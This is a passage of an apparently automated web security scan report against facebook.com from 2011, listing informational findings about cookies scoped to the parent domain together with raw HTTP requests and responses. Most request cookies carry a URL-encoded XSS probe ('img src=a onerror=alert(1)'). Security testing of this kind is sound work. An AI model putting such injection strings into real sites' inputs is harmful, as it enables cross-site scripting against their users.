Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.37. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.38. http://www.facebook.com/fayse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.39. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.40. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.41. http://www.facebook.com/gale.l.schenk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.42. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.43. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.44. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
  • next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0


10.45. http://www.facebook.com/izaOllie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.46. http://www.facebook.com/jezzas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.47. http://www.facebook.com/kimberly.christ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.48. http://www.facebook.com/ladonna.lokey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
